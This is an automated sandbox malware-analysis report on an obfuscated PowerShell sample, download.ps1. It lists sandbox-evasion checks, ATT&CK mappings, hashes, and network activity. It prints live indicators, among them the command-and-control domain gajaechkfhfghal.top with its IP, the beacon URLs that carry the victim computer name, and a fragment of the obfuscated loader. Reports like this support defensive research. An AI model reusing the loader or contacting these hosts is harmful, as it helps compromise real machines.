Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD881B3 rdtscp 0_2_00007FFD9BD881B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4045
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine`SJ
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1832085428.000001E2F90C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware`SJ
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine`
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1832557825.000001E2F9330000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1792974672.000001E280D5B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BD881B3 rdtscp 0_2_00007FFD9BD881B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
MITRE ATT&CK matrix (the number before a technique is the count of matching signatures):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 121 Virtualization/Sandbox Evasion | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | 121 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 11 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label | Link
download.ps1 | 5% | ReversingLabs | Win32.Trojan.Generic |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 172.217.21.36 | true | false | | high
gajaechkfhfghal.top | 45.61.136.138 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://gajaechkfhfghal.top/aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527 | false | | unknown
http://www.google.com/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://gajaechkfhfghal.top | powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E2814B5000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif | powershell.exe, 00000000.00000002.1792974672.000001E282347000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://photos.google.com/?tab=wq&pageId=none | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/preferences?hl=enX | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://news.google.com/?tab=wn | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/logos/doodles/2024/seasonal-holidays-202 | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/document/?usp=docs_alc | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schema.org/WebPage | powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E2824B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28263C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28265D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28266A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28232D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282347000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://0.google.com/ | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/webhp?tab=ww | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schema.org/WebPageX | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/finance?tab=we | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://maps.google.com/maps?hl=en&tab=wl | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com | powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1792974672.000001E280001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.blogger.com/?tab=wj | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527 | powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.google.com/mobile/?hl=en&tab=wD | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://play.google.com/?hl=en&tab=w8 | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/imghp?hl=en&tab=wi | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/shopping?hl=en&source=og&tab=wf | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s96 | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/?tab=wo | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://0.google | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mail.google.com/mail/?tab=wm | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.youtube.com/?tab=w1 | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://0.google. | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s96X | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://0.google.com/ | powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s24 | powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.google.com/history/optout?hl=en | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://books.google.com/?hl=en&tab=wp | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://translate.google.com/?hl=en&tab=wT | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/intl/en/about/products?tab=whX | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://calendar.google.com/calendar?tab=wc | powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1792974672.000001E280001000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lh3.googleusercontent.com/ogw/default-user=s24X | powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs (columns: IP, Domain, Country, ASN, ASN Name, Malicious):
IP: 45.61.136.138; Domain: gajaechkfhfghal.top; Country: United States; ASN: 40676; ASN Name: AS40676US; Malicious: false
IP: 172.217.21.36; Domain: www.google.com; Country: United States; ASN: 15169; ASN Name: GOOGLEUS; Malicious: false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579870
Start date and time: 2024-12-23 13:16:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal60.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 16
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6624 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: download.ps1
Time: 07:17:00; Type: API Interceptor; Description: 44x Sleep call for process: powershell.exe modified
Context for IP 45.61.136.138 (columns: Associated Sample Name / URL, Detection, Threat Name, Context):
download.ps1; malicious; Unknown; gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527
download.ps1; malicious; Unknown; gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527
download.ps1; malicious; Unknown; cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527
download.ps1; malicious; Unknown; cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527
download.ps1; malicious; Unknown; cmacnnkfbhlcncm.top/cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527
download.ps1; malicious; Unknown; cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527
download.ps1; malicious; Unknown; cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
download.ps1; malicious; Unknown; cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
download.ps1; malicious; Unknown; cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
download.ps1; malicious; Unknown; cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
Context for domain gajaechkfhfghal.top (columns: Associated Sample Name / URL, Detection, Threat Name, Context):
download.ps1; malicious; Unknown; 45.61.136.138
download.ps1; malicious; Unknown; 45.61.136.138
Context for ASN AS40676US (columns: Associated Sample Name / URL, Detection, Threat Name, Context):
download.ps1; malicious; Unknown; 45.61.136.138
download.ps1; malicious; Unknown; 45.61.136.138
loligang.mpsl.elf; malicious; Mirai; 107.176.168.244
download.ps1; malicious; Unknown; 45.61.136.138
download.ps1; malicious; Unknown; 45.61.136.138
download.ps1; malicious; Unknown; 45.61.136.138
download.ps1; malicious; Unknown; 45.61.136.138
download.ps1; malicious; Unknown; 45.61.136.138
download.ps1; malicious; Unknown; 45.61.136.138
download.ps1; malicious; Unknown; 45.61.136.138
                                                                                                                No context
                                                                                                                No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllul7got/Z:NllUkot
MD5: 71995B6B43EA2A2D49079E9E99E8D184
SHA1: A55CE57E044A814007D3EE7DCCF1527EF391036A
SHA-256: FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
SHA-512: 6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e................................................@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6221
Entropy (8bit): 3.7289812597319725
Encrypted: false
SSDEEP: 96:DdCG33CxHA5kvhkvCCtcuuSl7hHbuuSl7hHF:D4Gyg1cuvbuvF
MD5: D352E0CBFD110D598EDF5CA3EDA9298C
SHA1: AE92CB4D5ABBB11843E6263337B6566908564BC1
SHA-256: D7FD8911CBD62CD68F4733DD6BE9D7F9B7C2ED239303002A1394FD0B28DE12C4
SHA-512: 64F564B4FE38B5CFFA9AF00AE7139EF15B782AE1E46097F973346DAF036B4D0B17539AC923DEAB2BAD0F323871B66B28BD6D1E8D0AA5C336A60EE07559B9C05C
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6221
Entropy (8bit): 3.7289812597319725
Encrypted: false
SSDEEP: 96:DdCG33CxHA5kvhkvCCtcuuSl7hHbuuSl7hHF:D4Gyg1cuvbuvF
MD5: D352E0CBFD110D598EDF5CA3EDA9298C
SHA1: AE92CB4D5ABBB11843E6263337B6566908564BC1
SHA-256: D7FD8911CBD62CD68F4733DD6BE9D7F9B7C2ED239303002A1394FD0B28DE12C4
SHA-512: 64F564B4FE38B5CFFA9AF00AE7139EF15B782AE1E46097F973346DAF036B4D0B17539AC923DEAB2BAD0F323871B66B28BD6D1E8D0AA5C336A60EE07559B9C05C
Malicious: false
File type: ASCII text, with very long lines (10697), with CRLF line terminators
Entropy (8bit): 6.005992831097856
TrID:
File name: download.ps1
File size: 18'916 bytes
MD5: 6dc27c0ae6c260bbed7a9b00e3306263
SHA1: 66d59a64b88b605d7fe887b4bcf7c9ea298fbb57
SHA256: fca7d47c39e4e5b1e375ff7497d67cfbd2bb4d2fa937c617f5a6b5c3c71ccb21
SHA512: 11f4dcc0a45569b1e9a2a070945d9cb498d9eeb31550f405e0ac215b189ce2d5bb9d5d88cf2a6a1836418dcfd2e1e600a8e55a67ec2aaff555e2112310a8649f
SSDEEP: 384:4pLgpYa4i8Kg9AIL/ncToT6wAs1Ix9w62G7P1jWZLdtjMd7G8j0:4MNRUAOcToT61sG9UG7P1jIxtj1T
TLSH: C8827C60334CE4F5D18AC9A3AD56BC083B21785BC1D7A9D0B7BCC5C67B899859F8CC02
File Content Preview: $nzdxguep=$executioncontext;$ininenoratreinisonalreen = -join (0..54 | ForEach-Object {[char]([int]"00000098000000970000010200000095000001010000009900000101000001000000010000000095000001010000009300000094000001000000009700000101000000990000010100000101000
Icon Hash: 3270d6baae77db44
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 13:17:03.279046059 CET | 49467 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 13:17:03.678242922 CET | 53 | 49467 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 13:17:05.124254942 CET | 50280 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 13:17:05.262866020 CET | 53 | 50280 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 13:17:03.279046059 CET | 192.168.2.4 | 1.1.1.1 | 0xc67c | Standard query (0) | gajaechkfhfghal.top | A (IP address) | IN (0x0001) | false
